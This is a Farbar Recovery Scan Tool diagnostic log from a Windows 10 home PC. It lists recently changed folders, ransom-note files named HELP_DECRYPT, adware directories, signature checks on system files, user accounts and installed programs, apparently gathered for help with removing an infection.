2015-10-11 01:46 - 2015-02-01 23:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Xvid
2015-10-11 01:46 - 2015-02-01 23:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DivX
2015-10-11 01:46 - 2014-12-20 21:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft
2015-10-11 01:46 - 2014-12-14 12:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2015-10-11 01:46 - 2014-08-10 15:23 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2015-10-11 01:46 - 2014-06-04 20:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-10-11 01:46 - 2013-10-09 21:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tango
2015-10-11 01:46 - 2012-05-14 17:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-10-11 01:46 - 2012-02-20 15:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
2015-10-11 01:46 - 2012-02-20 15:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2015-10-11 01:46 - 2012-02-17 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
2015-10-11 01:46 - 2011-12-14 15:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media
2015-10-11 01:46 - 2011-12-09 10:25 - 00000000 ____D C:\WINDOWS\en
2015-10-11 01:46 - 2011-10-14 12:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Mouse
2015-10-11 01:46 - 2011-07-18 20:00 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink YouCam
2015-10-11 01:46 - 2011-07-18 19:54 - 00000000 ____D C:\WINDOWS\SysWOW64\Atheros_L1e
2015-10-11 01:46 - 2011-07-18 19:48 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-10-11 01:46 - 2011-05-18 19:34 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
2015-10-11 01:46 - 2011-05-18 19:24 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live
2015-10-11 01:46 - 2011-05-18 19:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2015-10-11 01:46 - 2009-07-13 22:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-10-11 01:44 - 2015-07-30 15:43 - 00005306 _____ C:\WINDOWS\DtcInstall.log
2015-10-11 01:44 - 2015-07-30 15:42 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-10-11 01:44 - 2015-07-30 15:42 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-10-11 01:44 - 2015-07-10 02:47 - 00000000 __RHD C:\Users\Default
2015-10-11 01:44 - 2009-07-13 20:20 - 00000000 ____D C:\Users\Default.migrated
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\SysWOW64\zh-HK
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\SysWOW64\tr-TR
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\zh-HK
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\tr-TR
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-10-11 01:39 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\IME
2015-10-11 01:39 - 2011-07-18 19:54 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2015-10-11 01:39 - 2011-05-18 19:20 - 00000000 ____D C:\WINDOWS\SysWOW64\Adobe
2015-10-11 01:38 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\schemas
2015-10-11 01:38 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2015-10-11 01:37 - 2015-07-30 15:42 - 00000000 __SHD C:\Program Files\Windows Sidebar
2015-10-11 01:37 - 2015-07-30 15:42 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2015-10-11 01:37 - 2015-07-30 15:42 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-10-11 01:37 - 2015-04-14 21:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-10-11 01:37 - 2014-10-01 22:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VSO
2015-10-11 01:37 - 2012-04-17 18:50 - 00000000 ____D C:\ProgramData\Intel
2015-10-11 01:37 - 2012-01-26 10:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Starter (English)
2015-10-11 01:37 - 2012-01-24 19:30 - 00000000 ____D C:\Program Files (x86)\Intel Corporation
2015-10-11 01:37 - 2011-07-18 20:43 - 00000000 ___RD C:\Users\Public\Recorded TV
2015-10-11 01:37 - 2011-07-18 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Renesas Electronics
2015-10-11 01:37 - 2011-07-18 19:51 - 00000000 ____D C:\Program Files\Intel
2015-10-11 01:37 - 2011-05-18 19:33 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink Power2Go
2015-10-11 01:37 - 2011-05-18 19:20 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Online Services
2015-10-11 01:37 - 2011-05-18 19:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roxio
2015-10-11 01:37 - 2011-05-18 19:14 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-10-11 01:37 - 2009-07-13 22:32 - 00000000 ____D C:\Program Files\Microsoft Games
2015-10-11 01:37 - 2009-07-13 22:32 - 00000000 ____D C:\Program Files\DVD Maker
2015-10-11 01:36 - 2015-07-30 15:42 - 00000000 ____D C:\WINDOWS\system32\Recovery
2015-10-11 01:36 - 2009-07-13 20:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2015-10-11 01:35 - 2015-07-26 22:08 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Farm Frenzy Inc
2015-10-11 01:35 - 2011-08-20 17:24 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HP
2015-10-11 01:32 - 2015-07-10 02:47 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2015-10-11 01:30 - 2011-05-18 19:39 - 00000000 ____D C:\Intel
2015-10-11 01:10 - 2012-01-26 10:59 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\SoftGrid Client
2015-10-11 00:41 - 2009-07-13 21:45 - 00032064 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-10-11 00:41 - 2009-07-13 21:45 - 00032064 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-10-10 23:35 - 2011-08-08 18:15 - 00000000 ____D C:\WINDOWS\System32\Tasks\Games
2015-10-10 23:01 - 2014-07-19 19:12 - 00000000 ____D C:\BigFishCache
2015-10-10 22:58 - 2012-02-20 15:40 - 00000000 ____D C:\Users\christopher lane\Documents\Outlook Files
2015-10-06 22:44 - 2011-08-08 19:16 - 00000052 _____ C:\WINDOWS\SysWOW64\DOErrors.log
2015-10-04 15:46 - 2015-08-27 23:38 - 00000000 ____D C:\Program Files (x86)\Dropbox
2015-10-04 15:11 - 2014-05-18 23:10 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\ICAClient
2015-10-04 15:11 - 2011-05-18 19:19 - 00000000 ____D C:\ProgramData\RoxioNow
2015-10-04 15:10 - 2012-02-10 09:19 - 00000000 __RHD C:\MSOCache
2015-09-26 06:22 - 2015-05-02 22:25 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\7478EF07-1430630736-4C1D-AFBD-C324CF5469FB
2015-09-26 06:22 - 2015-05-02 22:04 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\7478EF07-1430629466-4C1D-AFBD-C324CF5469FB
2015-09-26 06:22 - 2015-05-02 22:01 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\7478EF07-1430629277-4C1D-AFBD-C324CF5469FB
2015-09-26 06:22 - 2015-05-02 22:00 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\7478EF07-1430629233-4C1D-AFBD-C324CF5469FB
2015-09-23 21:33 - 2011-08-08 16:35 - 00000000 ____D C:\Program Files\Common Files\Apple
2015-09-23 21:29 - 2011-08-08 16:35 - 00002519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2015-09-23 00:14 - 2014-10-01 21:53 - 00000000 ____D C:\Program Files (x86)\Leawo
2015-09-21 01:34 - 2015-06-06 18:31 - 00000000 ____D C:\Program Files (x86)\ShOpDrop
2015-09-21 01:34 - 2015-06-06 18:30 - 00000000 ____D C:\Program Files (x86)\ShopDroop
2015-09-21 01:34 - 2015-06-06 18:30 - 00000000 ____D C:\Program Files (x86)\ShoopDrop
2015-09-21 01:34 - 2015-05-28 02:46 - 00000000 ____D C:\Program Files (x86)\PriceMienuS
2015-09-21 01:32 - 2015-06-28 00:10 - 00000000 ____D C:\Program Files (x86)\DisCouanntExtEnsii
2015-09-21 01:03 - 2011-05-18 19:30 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-09-20 21:54 - 2011-08-08 15:49 - 00110344 _____ C:\Users\christopher lane\AppData\Local\GDIPFONTCACHEV1.DAT
2015-09-20 21:52 - 2015-04-21 21:51 - 00000000 ____D C:\ProgramData\Wondershare
2015-09-20 20:32 - 2015-04-21 21:50 - 00000000 ____D C:\Users\Public\Documents\Wondershare
2015-09-20 20:06 - 2011-12-09 14:44 - 00000000 ____D C:\Program Files (x86)\AVS4YOU

==================== Files in the root of some directories =======

2015-06-12 07:35 - 2015-06-28 12:16 - 0000024 _____ () C:\Users\christopher lane\AppData\Roaming\appdataFr25.bin
2015-10-14 19:54 - 2015-10-14 19:54 - 0045954 _____ () C:\Users\christopher lane\AppData\Roaming\HELP_DECRYPT.PNG
2015-10-14 19:54 - 2015-10-14 19:54 - 0004254 _____ () C:\Users\christopher lane\AppData\Roaming\HELP_DECRYPT.TXT
2015-10-14 19:54 - 2015-10-14 19:54 - 0000292 _____ () C:\Users\christopher lane\AppData\Roaming\HELP_DECRYPT.URL
2015-01-22 23:20 - 2015-02-22 22:26 - 0099384 _____ () C:\Users\christopher lane\AppData\Roaming\inst.exe
2015-01-22 23:20 - 2015-02-22 22:26 - 0007859 _____ () C:\Users\christopher lane\AppData\Roaming\pcouffin.cat
2015-01-22 23:20 - 2015-02-22 22:26 - 0001167 _____ () C:\Users\christopher lane\AppData\Roaming\pcouffin.inf
2015-01-22 22:16 - 2015-02-22 22:26 - 0000033 _____ () C:\Users\christopher lane\AppData\Roaming\pcouffin.log
2015-01-22 23:20 - 2015-02-22 22:26 - 0082816 _____ (VSO Software) C:\Users\christopher lane\AppData\Roaming\pcouffin.sys
2015-04-19 05:20 - 2015-04-19 05:20 - 0005872 _____ () C:\Users\christopher lane\AppData\Roaming\rcyDrYnUALG
2014-09-01 01:18 - 2014-09-01 01:18 - 0001248 _____ () C:\Users\christopher lane\AppData\Roaming\UUJLZX
2013-06-18 21:24 - 2013-06-18 21:24 - 0001518 ___SH () C:\Users\christopher lane\AppData\Local\6o4v7yr6ikfw18072u
2015-10-14 19:54 - 2015-10-14 19:54 - 0045954 _____ () C:\Users\christopher lane\AppData\Local\HELP_DECRYPT.PNG
2015-10-14 19:54 - 2015-10-14 19:54 - 0004254 _____ () C:\Users\christopher lane\AppData\Local\HELP_DECRYPT.TXT
2015-10-14 19:54 - 2015-10-14 19:54 - 0000292 _____ () C:\Users\christopher lane\AppData\Local\HELP_DECRYPT.URL
2012-01-24 19:30 - 2012-01-24 19:30 - 0002544 _____ () C:\Users\christopher lane\AppData\Local\IWDAudHelper.20120124.193012.txt
2012-01-24 19:30 - 2012-01-24 19:30 - 0027648 _____ () C:\Users\christopher lane\AppData\Local\IWDAudHelper.20120124.193027.txt
2012-01-24 19:29 - 2012-01-24 19:29 - 0000944 _____ () C:\Users\christopher lane\AppData\Local\PDLSetup.20120124.192959.txt
2012-01-24 19:30 - 2012-01-24 19:30 - 0001888 _____ () C:\Users\christopher lane\AppData\Local\PDLSetup.20120124.193001.txt
2012-01-24 19:30 - 2012-01-24 19:30 - 0000960 _____ () C:\Users\christopher lane\AppData\Local\PDLSetup.20120124.193007.txt
2012-01-24 19:30 - 2012-01-24 19:30 - 0001520 _____ () C:\Users\christopher lane\AppData\Local\PDLSetup.20120124.193012.txt
2012-01-24 19:30 - 2012-01-24 19:30 - 0001520 _____ () C:\Users\christopher lane\AppData\Local\PDLSetup.20120124.193021.txt
2015-05-28 02:51 - 2015-05-28 02:51 - 0000000 _____ () C:\Users\christopher lane\AppData\Local\Temp.dat
2015-04-22 19:09 - 2015-04-22 19:14 - 0041872 _____ () C:\Users\christopher lane\AppData\Local\ZedgeLog.txt
2013-06-18 21:24 - 2013-06-18 21:24 - 0001518 ___SH () C:\ProgramData\6o4v7yr6ikfw18072u
2015-10-14 19:53 - 2015-10-14 19:53 - 0045954 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-10-14 19:53 - 2015-10-14 19:53 - 0004254 _____ () C:\ProgramData\HELP_DECRYPT.TXT
2015-10-14 19:53 - 2015-10-14 19:53 - 0000292 _____ () C:\ProgramData\HELP_DECRYPT.URL
2015-09-07 21:31 - 2015-09-07 21:31 - 0000016 _____ () C:\ProgramData\mntemp

Some files in TEMP:
====================
C:\Users\christopher lane\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpo8dcui.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-10-11 01:28

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:16-10-2015
Ran by christopher lane (2015-10-16 20:56:15)
Running from C:\Users\christopher lane\Desktop
Windows 10 Home (X64) (2015-10-11 08:58:19)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-2813116197-4237973809-2954861823-500 - Administrator - Disabled)
christopher lane (S-1-5-21-2813116197-4237973809-2954861823-1001 - Administrator - Enabled) => C:\Users\christopher lane
DefaultAccount (S-1-5-21-2813116197-4237973809-2954861823-503 - Limited - Disabled)
Guest (S-1-5-21-2813116197-4237973809-2954861823-501 - Limited - Disabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-2813116197-4237973809-2954861823-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.2.1.650 - Adobe Systems Incorporated)
Adobe Photoshop Elements 9 (HKLM-x32\...\Adobe Photoshop Elements 9) (Version: 9.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 9 (HKLM-x32\...\PremElem90) (Version: 9.0 - Adobe Systems Incorporated)
Adobe Reader X (10.1.15) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.15 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.5.9.620 - Adobe Systems, Inc.)
AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.1.42 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{574634E2-87F7-1DC7-082B-483C41E4989E}) (Version: 3.0.816.0 - ATI Technologies, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Big Fish: Game Manager (HKLM-x32\...\BFGC) (Version: 3.3.0.2 - )
BitTorrent (HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\BitTorrent) (Version: 7.9.2.34312 - BitTorrent Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 13.0.0.6685 - Citrix Systems, Inc.)
Country Tales (HKLM-x32\...\BFG-Country Tales) (Version: - )
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.3.3222 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.0.3922 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM-x32\...\DivX Setup) (Version: 2.7.0.77 - DivX, LLC)
Dropbox (HKLM-x32\...\Dropbox) (Version: 3.10.7 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.27.35 - Dropbox, Inc.) Hidden
Elements 9 Organizer (x32 Version: 9.0 - Adobe Systems Incorporated) Hidden
Elements STI Installer (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Farm Frenzy Inc. (HKLM-x32\...\BFG-Farm Frenzy Inc.) (Version: - )
Farm Frenzy: Heave Ho (HKLM-x32\...\BFG-Farm Frenzy - Heave Ho) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 46.0.2490.71 - Google Inc.)
Google Update Helper (x32 Version: 1.3.24.7 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP 3D DriveGuard (HKLM\...\{DFB497E0-CE3F-40FC-9596-FC7A48775DE4}) (Version: 4.1.16.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{A82F706D-6456-4E76-A037-4A00C4F0259D}) (Version: 1.1.0.0 - Hewlett-Packard)
HP ePrint Mobile (HKLM-x32\...\{2794875B-6CCF-48B8-84A5-5B10DB98BEE6}) (Version: - Hewlett-Packard)
HP MovieStore (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.3781 - HP Photo Creations Powered by RocketLife)
HP Quick Launch (HKLM-x32\...\{53B17A98-5BF0-40BC-AAFF-850A357975AC}) (Version: 2.7.2 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{210A03F5-B2ED-4947-B27E-516F50CBB292}) (Version: 8.6.4530.3651 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{1DFA0C99-6E2E-46F4-B242-51C7CF41DDE5}) (Version: 4.5.12.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}) (Version: 5.002.006.003 - Hewlett-Packard)
iCloud (HKLM\...\{709A2D23-C25E-47B5-9268-CB6FEE648504}) (Version: 4.1.1.53 - Apple Inc.)
Intel Digital Logo (HKLM-x32\...\{0635AEC4-0E4E-4641-9CD0-07D98428EA5A}) (Version: 1.0.5 - Hewlett-Packard Company)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{C7B40C35-85AE-4303-9EEA-1A1EA779664D}) (Version: 1.0.2.0511 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation)
Intel® WiDi (HKLM-x32\...\{0DD706AF-B542-438C-999E-B30C7F625C8D}) (Version: 2.1.39.0 - Intel Corporation)
Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version: - )
iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft IntelliPoint 8.2 (HKLM\...\Microsoft IntelliPoint 8.2) (Version: 8.20.468.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.5131.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Monument Builders: Golden Gate Bridge (HKLM-x32\...\BFG-Monument Builders - Golden Gate Bridge) (Version: - )
Movavi Video Converter 15 (HKLM-x32\...\Movavi Video Converter 15) (Version: 15.3.0 - Movavi)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Online Plug-in (x32 Version: 13.0.0.6685 - Citrix Systems, Inc.) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.5015 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.5015 - CyberLink Corp.) Hidden
PowerISO (HKLM-x32\...\PowerISO) (Version: 4.8 - PowerISO Computing, Inc.)
PX Profile Update (x32 Version: 1.00.1. - AMD) Hidden
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30127 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 2.0.0 - Hewlett-Packard) Hidden
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.34.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.34.0 - Renesas Electronics Corporation) Hidden
